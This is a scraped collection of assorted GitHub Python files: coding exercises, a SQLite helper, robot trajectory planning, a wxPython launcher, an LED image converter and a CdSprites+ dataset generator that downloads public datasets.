testing\"\"\"\r\n np.random.seed(123456)\r\n print(mask_for_training(insert_whitespace(\"RKDES\")))\r\n\r\n\r\nif __name__ == \"__main__\":\r\n import doctest\r\n\r\n doctest.testmod()\r\n main()\r\n","repo_name":"yanismiraoui/M4R-dash","sub_path":"featurization.py","file_name":"featurization.py","file_ext":"py","file_size_in_byte":11431,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"74948610064","text":"import sqlite3\n\nfrom sqlite3 import Error\n\n\ndef sql_connection():\n try:\n\n con = sqlite3.connect('local_police.db')\n return con\n\n except Error:\n\n print(Error)\n\n\ndef sql_table(con):\n cursorObj = con.cursor()\n # cursorObj.execute('insert into data VALUES(1,0,\" \"))')\n cursorObj.execute(\n \"CREATE TABLE IF NOT EXISTS police_station(id int AUTO_INCREMENT, rank varchar(10), incharge_name varchar(32), station_name varchar(50), state varchar(32), city varchar(32), area varchar(32), postalcode int, primary key(id))\")\n a = cursorObj.execute(\"SELECT station_name FROM police_station\")\n return a.fetchall()\n","repo_name":"harshidkoladara/Online-Police-Complain-System","sub_path":"mainconnection.py","file_name":"mainconnection.py","file_ext":"py","file_size_in_byte":648,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"34704347520","text":"import numpy as np\r\n\r\ndt = 0.1\r\n\r\ndef cubic_spiral(theta_i, theta_f,n=10):\r\n x = np.linspace(0, 1, num=n)\r\n return (theta_f-theta_i)*(-2*x**3 + 3*x**2) + theta_i\r\n \r\ndef straight(dist, curr_pose, radius, num_st_pts = 10):\r\n # the straight-line may be along x or y axis\r\n #curr_theta will determine the orientation\r\n x0, y0, t0 = curr_pose\r\n xf, yf = x0 + dist*np.cos(t0), y0 + dist*np.sin(t0)\r\n x = (xf - x0) * np.linspace(0, 1, num_st_pts) + x0\r\n y = (yf - y0) * np.linspace(0, 1, num_st_pts) + y0\r\n return x, y, t0*np.ones_like(x)\r\n\r\ndef turn(change, curr_pose, radius, num_turn_pts = 50):\r\n # adjust scaling constant for desired turn radius\r\n x0, y0, t0 = curr_pose\r\n theta = cubic_spiral(t0, t0 + np.deg2rad(change), num_turn_pts)\r\n x= x0 + np.cumsum(np.cos(theta)*dt*radius/3)\r\n y= y0 + np.cumsum(np.sin(theta)*dt*radius/3)\r\n return x, y, theta\r\n\r\ndef generate_trajectory(route, init_pose = (0, 0,np.pi/2),radius = 0.5):\r\n curr_pose = init_pose\r\n func = {'straight': straight, 'turn': turn}\r\n x, y, t = np.array([]), np.array([]),np.array([])\r\n for manoeuvre, command in route:\r\n px, py, pt 
= func[manoeuvre](command, curr_pose, radius)\r\n        curr_pose = px[-1],py[-1],pt[-1]\r\n        x = np.concatenate([x, px])\r\n        y = np.concatenate([y, py])\r\n        t = np.concatenate([t, pt])\r\n        \r\n    return np.vstack([x, y, t])\r\n\r\ndef get_route(path,radius = 0.5):\r\n    path_list = np.array(path) \r\n    route = []\r\n    segment = ['straight',1-radius]\r\n    \r\n    for i in range(len(path_list)-2):\r\n        x1,y1 = path_list[i][0],path_list[i][1]\r\n        x2,y2 = path_list[i+1][0],path_list[i+1][1]\r\n        x3,y3 = path_list[i+2][0],path_list[i+2][1]\r\n        check = ((x1-x2)*(y3-y2) - (x3-x2)*(y2-y1))\r\n        if check == 0:\r\n            segment[1] += 1\r\n\r\n        else:\r\n            route.append(tuple(segment))\r\n            segment[0] = 'turn'\r\n            \r\n            if check>0:\r\n                if x1 == x2:\r\n                    segment[1] = 90\r\n                else:\r\n                    segment[1] = -90 \r\n            else:\r\n                if x1 == x2:\r\n                    segment[1] = -90 \r\n                else:\r\n                    segment[1] = 90\r\n            \r\n            route.append(tuple(segment))\r\n            segment = ['straight',1-2*radius] \r\n        \r\n    segment[1] += radius\r\n    route.append(tuple(segment))\r\n    return route ","repo_name":"naveenmoto/lablet102","sub_path":"project/submissions/kshitij/trajectory.py","file_name":"trajectory.py","file_ext":"py","file_size_in_byte":2278,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"}
{"seq_id":"2706170756","text":"\n\"\"\"A ‘launcher’ window that gives a simple choice between different sub-apps and maybe recently used files (like LibreOffice does if you start it directly)\"\"\"\n\nfrom . import main\nimport wx\n\nclass LauncherWin(main.CDSWin):\n    title = \"Conlang Development Suite\"\n    def build(self):\n        # this is not at all pretty, but for testing, it will do.\n        phonologyButton = wx.Button(self.frame, label=\"Phonology\")\n        dictionaryButton = wx.Button(self.frame, label=\"Dictionary\")\n        ## other apps\n        \n        self.frame.Sizer = wx.BoxSizer(wx.VERTICAL)\n        # Sizer.Add takes (window, proportion, flag): pass wx.EXPAND as the flag, not the proportion\n        self.frame.Sizer.Add(phonologyButton, 0, wx.EXPAND)\n        self.frame.Sizer.Add(dictionaryButton, 0, wx.EXPAND)\n        \n        def onButton(windowType):\n            # Return a button click event handler\n            def handler(event):\n                wx.GetApp().newWindow(windowType)\n                self.frame.Close()\n            return handler\n        self.frame.Bind(wx.EVT_BUTTON, onButton(\"phonology\"), phonologyButton)\n        self.frame.Bind(wx.EVT_BUTTON, onButton(\"dictionary\"), dictionaryButton)","repo_name":"kylanbb/Conlang-Development-Suite","sub_path":"src/common/launcher.py","file_name":"launcher.py","file_ext":"py","file_size_in_byte":1084,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"44013383124","text":"from django.urls import path\n\nfrom . 
import views\n\nurlpatterns = [\n    path(\"item\", views.ItemView.as_view()),\n    path(\"get-all-items\", views.get_all_items),\n    path(\"delete-item/\", views.delete_item),\n    path(\"add-item\", views.add_item),\n]\n","repo_name":"nickav2004/simple-cart-app","sub_path":"mhs/api/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":252,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"32125837197","text":"f = open(\"spiciesURL.txt\",\"r\")\ng = open(\"spedictionary.txt\",\"r\")\nh = open(\"dictionaryfinal.txt\",\"w\")\n\nA = f.readlines()\nB = g.readlines()\n\nLA = len(A)\nLB = len(B)\n\nh.write(B[0]+str(B[1]).replace(\"\\n\",\"\")+\"\\t\"+\"Biosample\"+\"\\t\"+\"Bioproject\"+\"\\n\")\n\nfor i in range(0,LA):\n    a = A[i].split(\"\\t\")\n    for j in range(2,LB):\n        b = B[j].split(\"\\t\")\n        if a[0] == b[0]:\n            h.write(str(B[j]).replace(\"\\n\",\"\")+\"\\t\"+a[2]+\"\\t\"+a[1]+\"\\n\")\n\n# Adds the Biosample and Bioproject information to the spedictionary.txt\n# file that was created during the download step\n\nf.close()\ng.close()\nh.close()\n","repo_name":"limchanyoung1116/probiotics-geneticfeature","sub_path":"genome/5. genomenumbering/makedic.py","file_name":"makedic.py","file_ext":"py","file_size_in_byte":603,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"24133866090","text":"eggs_start = int(input())\neggs_counter = 0\neggs_num_last = 0\neggs_are_finished = False\nis_closed = False\nwhile True:\n    command = input()\n    if command == \"Close\":\n        is_closed = True\n        break\n    eggs_number = int(input())\n    if command == \"Buy\":\n        eggs_counter += eggs_number\n    else:\n        eggs_start += eggs_number\n    if eggs_counter > eggs_start:\n        eggs_num_last = eggs_number\n        eggs_are_finished = True\n        break\ndiff = abs(eggs_start - eggs_counter)\nif is_closed:\n    print(\"Store is closed!\")\n    print(f\"{eggs_counter} eggs sold.\")\nif eggs_are_finished:\n    print(\"Not enough eggs in store!\")\n    print(f\"You can buy only {eggs_num_last - diff}.\")","repo_name":"1van101/SoftUni-Software-Engineering","sub_path":"python_basics/exams/20_and_21_april_2019/easter_shop.py","file_name":"easter_shop.py","file_ext":"py","file_size_in_byte":695,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"15121042615","text":"#!python3\n\nfrom collections import defaultdict\nimport re\n\nINPUT = 'day07.txt'\n\nTEST_INPUT = '''light red bags contain 1 bright white bag, 2 muted yellow bags.\ndark orange bags contain 3 bright white bags, 4 muted yellow bags.\nbright white bags contain 1 shiny gold bag.\nmuted yellow bags contain 2 shiny gold bags, 9 faded blue bags.\nshiny gold bags contain 1 dark olive bag, 2 vibrant plum bags.\ndark olive bags contain 3 faded blue bags, 4 dotted black bags.\nvibrant plum bags contain 5 faded blue bags, 6 dotted black bags.\nfaded blue bags contain no other bags.\ndotted black bags contain no other bags.\n'''\n\nTEST_INPUT2 = '''shiny gold bags contain 2 dark red bags.\ndark red bags contain 2 dark orange bags.\ndark orange bags contain 2 dark yellow bags.\ndark yellow bags contain 2 dark green bags.\ndark green bags contain 2 dark blue bags.\ndark blue bags contain 2 dark violet bags.\ndark violet bags contain no other bags.\n'''\n\nPATTERN = r'(\\d+)\\s(\\w+\\s\\w+)'\nBAG = re.compile(PATTERN)\n\n\ndef parse_contents(contents):\n    '''\n    Parse string of form\n        1 bright white bag, 2 muted yellow bags\n    to a dict\n        {'bright white': 1, 'muted yellow': 2}\n    '''\n    bags = 
{}\n for m in re.finditer(PATTERN, contents):\n n = int(m.group(1))\n bags[m.group(2)] = n\n return bags\n\n\ndef get_input(input):\n contains = {}\n for line in input.strip().split('\\n'):\n bag, contents = line.split(' contain ')\n bag = bag.rsplit(' ', 1)[0]\n c = parse_contents(contents)\n contains[bag] = c\n return contains\n\n\ndef get_reverse(bags):\n '''Reverses the relationship in `get_input`.'''\n result = defaultdict(list)\n for bag, contents in bags.items():\n for b in contents.keys():\n result[b].append(bag)\n return result\n\n\ndef is_contained_in_count(bag, reverse_bags):\n '''Part 1 counter.\n\n Just a simple search algorithm.\n '''\n to_check = reverse_bags[bag]\n seen = set()\n while to_check:\n item = to_check.pop()\n if item in seen:\n continue\n seen.add(item)\n for b in reverse_bags[item]:\n to_check.append(b)\n return len(seen)\n\n\ndef contains_count_helper(bag, count, bags):\n others = bags[bag]\n if not others:\n yield 0\n for b, c in others.items():\n yield count * c\n yield from contains_count_helper(b, count * c, bags)\n\n\ndef contains_count(bag, bags):\n '''Part 2 counter.'''\n return sum(contains_count_helper(bag, 1, bags))\n\n\ndef test1(bags):\n reverse_bags = get_reverse(bags)\n c = is_contained_in_count('shiny gold', reverse_bags)\n assert c == 4\n\n\ndef part1(bags):\n reverse_bags = get_reverse(bags)\n return is_contained_in_count('shiny gold', reverse_bags)\n\n\ndef test2(bags1, bags2):\n n = contains_count('shiny gold', bags1)\n assert n == 32\n\n n = contains_count('shiny gold', bags2)\n assert n == 126\n\n\ndef part2(bags):\n return contains_count('shiny gold', bags)\n\n\ndef main():\n bags = get_input(open(INPUT, 'r').read())\n test_bags_1 = get_input(TEST_INPUT)\n test_bags_2 = get_input(TEST_INPUT2)\n\n test1(test_bags_1)\n\n p = part1(bags)\n print(p)\n\n test2(test_bags_1, test_bags_2)\n\n p = part2(bags)\n print(p)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"PreludeAndFugue/AdventOfCode","sub_path":"2020/python/day07.py","file_name":"day07.py","file_ext":"py","file_size_in_byte":3273,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"37599793586","text":"from PIL import Image, ImageOps\nimport math\nimport os, os.path\n\nclass LedwallImageCreator:\n def __init__(self,picdir):\n self.picdir = picdir\n\n def compute(self, pixel):\n r,g,b,a = pixel\n if a == 0:\n return 0\n #val = round(math.sqrt(math.pow(r,2) + math.pow(g,2) + math.pow(b,2)) )\n val = 0.299*r + 0.587*g + 0.114*b\n if val < 1.0:\n val = 1\n return val\n\n def processImages(self):\n for root, dirs, files in os.walk(self.picdir):\n for i in dirs:\n pass\n #retDirs.append(os.path.join(root,i))\n self.outputText = '#ifndef ANIMATION_H\\n#define ANIMATION_H\\n' \n myFiles =[]\n for imFile in files:\n if '.png' in imFile:\n self.processImage(imFile) \n self.outputText +='#endif'\n fp = open('animation.h','wb')\n fp.write(self.outputText)\n fp.close()\n\n def processImage(self,fileName):\n imPath = os.path.join(self.picdir,fileName)\n print ('imPath', imPath)\n im = Image.open(imPath)\n w,h = im.size\n im = ImageOps.mirror(im)\n pix = im.load()\n output = []\n for i in range(64*32):\n output.append(0)\n if w != 32:\n print('invalid image width, should be 32 px')\n if h != 64:\n print('invalid image height, should be 64 px')\n for y in range(64):\n for x in range(32):\n pixelVal = pix[x,y]\n val = int(round(self.compute(pixelVal)))\n output[y*32+x] = val\n\n frameName = fileName.split('.')[0]\n self.outputText += 
'static unsigned int '+frameName+'[2048] = {'\n        for val in output:\n            self.outputText += str(val)+', '\n\n        self.outputText = self.outputText[:-2]+'};\\n'\n        \n        \nif __name__ == '__main__':\n    lwImCr = LedwallImageCreator('images')\n    lwImCr.processImages()\n\n","repo_name":"fullscreennl/led-mirror","sub_path":"software/scripts/ledwall_image_creator.py","file_name":"ledwall_image_creator.py","file_ext":"py","file_size_in_byte":1986,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"}
{"seq_id":"1495299473","text":"class Solution:\n    def checkIfPangram(self, sentence: str) -> bool:\n        if(len(sentence)<26):\n            return False\n        my_set=set()\n        for i in range(len(sentence)):\n            my_set.add(sentence[i])\n        return len(my_set)==26\n        \n        ","repo_name":"AsmaKacem1/Leetcode","sub_path":"1832-check-if-the-sentence-is-pangram/1832-check-if-the-sentence-is-pangram.py","file_name":"1832-check-if-the-sentence-is-pangram.py","file_ext":"py","file_size_in_byte":272,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"}
{"seq_id":"73067580307","text":"def h():\n    print(\"你好\")\n    yield 5\n    print(\"再见\")\n\n\nfor n in h():\n    print(n)\n\n\ndef h():\n    print(\"Wen Chuan\")\n    m = yield 5 # Fighting!\n    print(m)\n    d = yield 12\n    print('We are together!')\n\n\nc = h()\nc.__next__() # equivalent to c.send(None)\nc.send('Fighting!') # the (yield 5) expression is assigned 'Fighting!'\n\n\ndef h1():\n    print('houshuai')\n    m = yield 5 # Fighting!\n    print(m)\n    d = yield 12\n    print('We are together!')\n\n\nc = h1()\nm = c.__next__() # m gets 5, the value of yield 5\nd = c.send('Fighting!') # d gets 12, the value of yield 12\nprint('We will never forget the date', m, '.', d)\n","repo_name":"LikeRainDay/TensorFlow","sub_path":"Test/TestPython.py","file_name":"TestPython.py","file_ext":"py","file_size_in_byte":626,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"}
{"seq_id":"29304769782","text":"#!/usr/bin/env python3\n\"\"\"Setup script. 
Used by easy_install and pip.\"\"\"\n\nimport os\nfrom setuptools import setup, find_packages\n\nBASE_PATH = os.path.dirname(os.path.abspath(__file__))\nSRC_PATH = os.path.join(BASE_PATH, \"src\")\nPACKAGES = find_packages(where=SRC_PATH)\n\nNAME = 'HartreeParticleDSL'\nAUTHOR = (\"Aidan Chalk \")\nAUTHOR_EMAIL = 'aidan.chalk@stfc.ac.uk'\nURL = 'https://github.com/NYI'\nDOWNLOAD_URL = 'https://github.com/NYI'\nDESCRIPTION = ('HartreeParticleDSL - A Generic Particle DSL supporting a variety of backends')\nLONG_DESCRIPTION = '''\\\nTBD\n'''\nLICENSE = ' TBD '\n\nCLASSIFIERS = [\n 'Development Status :: 3 - Alpha',\n 'Environment :: Console',\n 'Intended Audience :: Developers',\n 'Intended Audience :: Science/Research',\n 'Natural Language :: English',\n 'Programming Language :: Python',\n 'Topic :: Scientific/Engineering',\n 'Topic :: Software Development',\n 'Topic :: Utilities',\n 'Operating System :: POSIX',\n 'Operating System :: Unix']\n\nVERSION = '0.0.1a'\n\nif __name__ == '__main__':\n\n def get_files(directory, install_path, valid_suffixes):\n '''Utility routine that creates a list of 2-tuples, each consisting of\n the target installation directory and a list of files\n (specified relative to the project root directory).\n\n :param str directory: the directory containing the required files.\n :param str install_path: the location where the files will be placed.\n :param valid_suffixes: the suffixes of the required files.\n :type valid_suffixes: [str]\n\n :returns: a list of 2-tuples, each consisting of the target \\\n installation directory and a list of files (specified relative \\\n to the project root directory).\n :rtype: [(str, [str])]\n\n '''\n examples = []\n for dirpath, _, filenames in os.walk(directory):\n if (\"__\" not in dirpath) and filenames:\n rel_path = os.path.relpath(dirpath, directory)\n files = []\n for filename in filenames:\n if any([filename.endswith(suffix) for\n suffix in valid_suffixes]):\n files.append(\n os.path.join(os.path.basename(install_path),\n rel_path, filename))\n if files:\n examples.append((os.path.join(install_path, rel_path),\n files))\n return examples\n\n # We have all of the example, tutorial and wrapper libraries files\n # listed in MANIFEST.in but unless we specify them in the data_files\n # argument of setup() they don't seem to get installed.\n # Since the data_files argument doesn't accept wildcards we have to\n # explicitly list every file we want.\n # INSTALL_PATH controls where the files will be installed.\n # VALID_SUFFIXES controls the type of files to include.\n\n EGS_DIR = os.path.join(BASE_PATH, \"examples\")\n INSTALL_PATH = os.path.join(\"share\", \"HartreeParticleDSL\", \"examples\")\n VALID_SUFFIXES = [\"90\", \"py\", \"md\", \".c\", \".cl\", \"Makefile\", \".mk\", \"cpp\", \"hpp\"]\n EXAMPLES = get_files(EGS_DIR, INSTALL_PATH, VALID_SUFFIXES)\n\n LIBS_DIR = os.path.join(BASE_PATH, \"lib\")\n INSTALL_PATH = os.path.join(\"share\", \"HartreeParticleDSL\", \"lib\")\n VALID_SUFFIXES = [\"90\", \"sh\", \"py\", \"md\", \"Makefile\", \".mk\",\n \".jinja\", \"doxyfile\", \"cpp\", \"hpp\"]\n LIBS = get_files(LIBS_DIR, INSTALL_PATH, VALID_SUFFIXES)\n setup(\n name=NAME,\n version=VERSION,\n author=AUTHOR,\n author_email=(AUTHOR_EMAIL),\n license=LICENSE,\n url=URL,\n description=DESCRIPTION,\n long_description=LONG_DESCRIPTION,\n classifiers=CLASSIFIERS,\n packages=PACKAGES,\n package_dir={\"\": \"src\"},\n package_data = {\"\" : [\"*.hpp\", \"*.cpp\"]},\n install_requires=['pyparsing', 'six'],\n extras_require={\n 'dag': 
[\"graphviz\"],\n 'doc': [\"sphinx\", \"sphinxcontrib.bibtex < 2.0.0\",\n \"sphinx_rtd_theme\", \"autoapi\"],\n 'psydata': [\"Jinja2\"],\n 'test': [\"pep8\", \"pylint\", \"pytest-cov\", \"pytest-pep8\",\n \"pytest-pylint\", \"pytest-flakes\", \"pytest-pep257\"],\n },\n include_package_data=True,\n# scripts=['bin/psyclone', 'bin/genkernelstub', 'bin/psyad'],\n data_files=LIBS\n )\n\n","repo_name":"stfc/HartreeParticleDSL","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":4476,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"6557274221","text":"\"\"\" \nThis demonstrates how to use the image.h5 file\ntogether with the index file keypoints.h5\n\nto write images to png subfolder\n\"\"\"\n\n\nimport contextlib\nimport os\nimport h5py\nfrom imageio import imwrite\nfrom tqdm import tqdm\n\nclass cfg:\n step=224\n\ndef clip_image_from_keypoionts(image, keypoints, step, output):\n\n for dsname in keypoints:\n print(keypoints[dsname])\n k = 0\n for i,j in tqdm(keypoints[dsname][:]):\n imagename = \"-\".join(dsname.split(\"-\")[:-1])\n img = image[imagename][slice(i, i + step),slice(j, j + step),:]\n\n if (img.shape == (step,step,3)):\n imwrite(f\"{output}/after_{i}_{j}_{k}.png\",img)\n k += 1\n\nif __name__ == \"__main__\":\n \n # png folder\n output = \"collapsed_png\"\n if not os.path.exists(output):\n os.makedirs(output)\n\n # image h5\n image = h5py.File(\"after_earthquake_example.h5\")\n # keypoints h5\n keypoints = h5py.File(\"collapsed-keypoints.h5\")\n\n clip_image_from_keypoionts(image, keypoints, cfg.step, output)\n\n image.close()\n keypoints.close()","repo_name":"Wjppppp/ClipFinetuner","sub_path":"data/03_generate_png.py","file_name":"03_generate_png.py","file_ext":"py","file_size_in_byte":1055,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"12631727312","text":"\"\"\"\nCode for generation of the CdSprites+ dataset.\n\nThis code is adapted from https://github.com/yordanh/interp_latent_spaces featuring dSprites with color, published as a paper\n\"Interpretable Latent Spaces for Learning from Demonstration\".\nWe changed some functions, added textures to the shapes and backgrounds and also added natural language captions.\nWe also created 5 difficulty levels.\n\nOriginal code: https://github.com/yordanh/interp_latent_spaces/blob/master/src/preprocess_dsprites.py\nauthor :Yordan Hristov \ndate :05/2018\npython_version :2.7.14\n\nModification:\nauthor :Gabriela Sejnova \ndate :05/2023\npython_version :3.8\n==============================================================================\n\"\"\"\n\nimport numpy as np\nimport cv2\nimport numpy, random\nimport argparse\nimport os, glob\nimport shutil\nimport itertools\nimport copy\nimport json\nimport wget\nimport tarfile\nimport h5py\n\ndsprites_path = \"./dsprites_ndarray_co1sh3sc6or40x32y32_64x64.npz\"\nif not os.path.exists(dsprites_path):\n url = 'https://data.ciirc.cvut.cz/public/groups/incognite/CdSprites/dsprites_ndarray_co1sh3sc6or40x32y32_64x64.npz'\n wget.download(url)\nparser = argparse.ArgumentParser(description='Process the dSprited dataset.')\nparser.add_argument('--image_size', default=64, type=int, help='Width and height of the images in px.')\nparser.add_argument('--level', default=0, type=int, help='If you only want to generate one level of the dataset')\n\n\n\nclass ConfigParser(object):\n def __init__(self, filename):\n file = open(filename, \"r\")\n self.config = 
json.load(file)\n\n    def parse_specs(self):\n        specs = {'train': [], \"unseen\":[]}\n        specs['train'] = self.config['data_generation']['train']['spec']\n        # for record in self.config['data_generation']['unseen']:\n        #     specs['unseen'].append((record['label'], record['spec']))\n        return specs\n\ndef change_brightness(img, value=30, increase=True):\n    hsv = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)\n    h, s, v = cv2.split(hsv)\n\n    if increase:\n        lim = 255 - value\n        v[v > lim] = 255\n        v[v <= lim] += value\n    else:\n        lim = 0 + value\n        v[v < lim] = 0\n        # subtract only from pixels that will not underflow (uint8 values wrap around)\n        v[v >= lim] -= value\n\n    final_hsv = cv2.merge((h, s, v))\n    img = cv2.cvtColor(final_hsv, cv2.COLOR_HSV2BGR)\n    return img\n\ndef colorize_background(image, texture):\n    ### Replaces black pixels in the image with the background texture\n    tex = cv2.resize(texture, image.shape[:2])\n    gray_image = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n    mask = gray_image == 0\n    out = cv2.bitwise_and(tex, tex, image, mask.astype(np.uint8))\n    outp = cv2.normalize(out, dst=None, alpha=0, beta=255, norm_type=cv2.NORM_MINMAX, dtype=cv2.CV_8U)\n    return outp\n\ndef colorize_texture(texture, rgb):\n    ### Takes the loaded texture image (RGB, 0-255) and changes color based on the RGB array (0-255)\n    texture = texture_to_bnw(texture, shade=\"light\")\n    return texture * rgb/255\n\ndef texture_to_bnw(texture, shade=None):\n    tex = cv2.cvtColor(texture, cv2.COLOR_BGR2GRAY)\n    tex = numpy.tile(tex.reshape(tex.shape[0], tex.shape[1], 1), (1, 1, 3))\n    outp = cv2.normalize(tex, dst=None, alpha=0, beta=255, norm_type=cv2.NORM_MINMAX, dtype=cv2.CV_8U)\n    if shade is not None:\n        if shade == \"light\":\n            outp = change_brightness(outp, 125)\n        else:\n            outp = change_brightness(outp, 200, increase=False)\n    return outp\n\ndef make_textured_shape(image, texture):\n    ### Takes the input RGB image with black background and adds the colored texture to the shape\n    out = image * cv2.resize(texture, image.shape[:2])\n    outp = cv2.normalize(out, dst=None, alpha=0, beta=255, norm_type=cv2.NORM_MINMAX, dtype=cv2.CV_8U)\n    return outp\n\ndef prep_dir(folder_name):\n    print(\"Preparing \" + folder_name)\n    if os.path.exists(folder_name):\n        print(\"Cleaning \" + folder_name)\n        # map() is lazy in Python 3, so iterate explicitly to actually delete the folders\n        for object_folder in os.listdir(folder_name):\n            shutil.rmtree(folder_name + object_folder)\n        print(folder_name + \" has been cleaned!\")\n    else:\n        os.makedirs(folder_name)\n\n\n# extracts images for a single label - e.g big and blue in the label group big_blue\ndef extract(folder_name=None, labels=None, args=None, latent_spec=None, image_size=None, verbose=False):\n    print(\"Extracting images for \" + folder_name + str(labels))\n    if \"position\" not in latent_spec.keys():\n        x_pose = latent_spec['x']\n        y_pose = latent_spec['y']\n    else:\n        x_pose = latent_spec['position'][0]\n        y_pose = latent_spec['position'][1]\n    indices = []\n    for i, c in enumerate(data['latents_classes']):\n        if (c[1] in latent_spec['shape'] and\n            c[2] in latent_spec['scale'] and\n            c[3] in latent_spec['orientation'] and\n            c[4] in x_pose and\n            c[5] in y_pose):\n            indices.append(i)\n\n    random.shuffle(indices)\n    images = numpy.take(data['imgs'], indices[:sample_num], axis=0)\n\n    for i, image in enumerate(images):\n        image = cv2.resize(image, (image_size, image_size))\n\n        for bgr_color in latent_spec[\"color\"]:\n            if len(latent_spec[\"textured\"]) == 0:\n                image_out = numpy.tile(image.reshape(image_size, image_size, 1), (1, 1, 3)) * bgr_color\n                image_out = cv2.cvtColor(image_out.astype(np.uint8), cv2.COLOR_BGR2RGB)\n            else:\n                if \"shapes\" in latent_spec[\"textured\"]:\n                    t = random.randint(0, 
len(textures)-1)\n image_out = make_textured_shape(numpy.tile(image.reshape(image_size, image_size, 1), (1, 1, 3)), colorize_texture(textures[t], bgr_color))\n if \"background\" in latent_spec[\"textured\"]:\n image_out = colorize_background(image_out, texture_to_bnw(random.choice(textures), shade=labels[-1].split(\"_\")[-1]))\n image_out = cv2.cvtColor(image_out, cv2.COLOR_BGR2RGB)\n object_folder_name = folder_name + \"_\".join(labels) + \"/\"\n cv2.imwrite(object_folder_name + \"/\" + str(label_counters[\"_\".join(labels)]) + \".png\", image_out)\n label_counters[\"_\".join(labels)] += 1\n\n if verbose:\n cv2.imshow(\"image\", image_out)\n cv2.waitKey()\n\n if i % 100 == 0:\n print(\"{0} images have been processed so far.\".format(i))\n print(label_counters)\n\n\n# extracts symbols for a label group - e.g big_blue\ndef extract_label_groups(label_groups=None, unseen=None, latent_spec=None, mappings=None, folder_name=None, args=None):\n # build up the labels for all objects - take the combinations of the\n # lists in label_groups\n textured = label_groups[\"textured\"]\n label_groups.pop(\"textured\")\n if len(textured) > 0 and not \"level3\" in cfg:\n label_groups[\"position\"] = [\"at_top_right\", \"at_top_left\", \"at_bottom_left\", \"at_bottom_right\"]\n if \"background\" in textured:\n label_groups[\"textured\"] = [\"on_light\", \"on_dark\"]\n object_labels = list(itertools.product(*[label_groups[x] for x in label_groups]))\n for labels in object_labels:\n object_folder_name = folder_name + \"_\".join(labels) + \"/\"\n os.makedirs(object_folder_name, exist_ok=True)\n revised_latent_spec = revise_latent_spec(copy.deepcopy(latent_spec), labels, mappings)\n label_counters[\"_\".join(labels)] = 0\n revised_latent_spec[\"textured\"] = textured\n extract(folder_name=folder_name, labels=labels, args=args, latent_spec=revised_latent_spec,\n image_size=args.image_size)\n\n\n# revise the latent class specification, depending on the\n# given labels; we know what labels map to what classes\n# across the different factors of variation\ndef revise_latent_spec(latent_spec, label, mappings):\n colors = latent_spec[\"color\"]\n latent_spec[\"color\"] = []\n for color in colors:\n latent_spec[\"color\"] += mappings[\"color\"][color]\n mappings_keys = mappings.keys()\n for key in label:\n for mkey in mappings_keys:\n if key in mappings[mkey].keys():\n new_value = mappings[mkey][key]\n if isinstance(new_value, list):\n latent_spec[mkey] = new_value\n else:\n latent_spec[mkey] = [new_value]\n break\n return latent_spec\n\ndef download_textures(dtd_path):\n print(\"Downloading textures...\")\n url = 'https://www.robots.ox.ac.uk/~vgg/data/dtd/download/dtd-r1.0.1.tar.gz'\n wget.download(url)\n file = tarfile.open(dtd_path)\n file.extractall('./dtd_textures')\n file.close()\n\ndef load_textures(dtd_path=\"./dtd_textures\"):\n if not os.path.exists(dtd_path):\n download_textures(dtd_path)\n textures_paths = glob.glob(os.path.join(dtd_path, './*/*/*/*.jpg'))\n textures = []\n for i in textures_paths:\n textures.append(cv2.imread(i))\n return textures\n\nif __name__ == \"__main__\":\n args = parser.parse_args()\n data = np.load(dsprites_path)\n label_counters = {}\n #textures = load_textures()\n if args.level == 0:\n cfgs = [\"config_level2.json\", \"config_level3.json\", \"config_level4.json\", \"config_level5.json\"]\n else:\n cfgs = [\"config_level{}.json\".format(args.level)]\n for cfg in cfgs:\n config_parser = ConfigParser(cfg)\n sample_num = config_parser.config[\"samples_num\"]\n mappings = {}\n 
mappings['color'] = {'white': [numpy.array([255, 255, 255])],\n 'red': [numpy.array([192, 64, 0])],\n 'yellow': [numpy.array([228, 217, 111])],\n 'green': [numpy.array([10, 107, 60])],\n 'blue': [numpy.array([0, 127, 200])],\n 'pink': [numpy.array([255, 0, 255])]\n }\n mappings['shape'] = {'square': 0, 'ellipse': 1, 'heart': 2}\n mappings['scale'] = {'small': [0], 'medium': [2], 'big': [5]}\n mappings['orientation'] = {'rotated': [4, 14, 24, 34], 'flat': [0, 10, 20, 39]}\n mappings[\"position\"] = {\"at_top_right\":[[26,27,28,29,30,31],[1,2,3,5,6,7,8,9]],\n \"at_top_left\":[[1,2,3,5,6,7,8,9],[1,2,3,5,6,7,8,9]],\n \"at_bottom_left\":[[1,2,3,5,6,7,8,9],[26,27,28,29,30,31]],\n \"at_bottom_right\":[[26,27,28,29,30,31],[26,27,28,29,30,31]]}\n\n # describes the specification wrt to which we filter the\n # images, depending on their latent factor classes\n # the spec is refined once we are given labels\n latent_spec = {'color': ['white', 'red', 'yellow', 'green', 'blue', 'pink'],\n 'shape': [0,1,2], # range(3),\n 'scale': [0, 5], # range(6),\n 'orientation': range(45),\n 'x': [5,6,7,8,9,10,11,12,13, 14, 15, 16, 17,18,19,20,21,22,23,24,25,26,27,28,29],\n 'y': 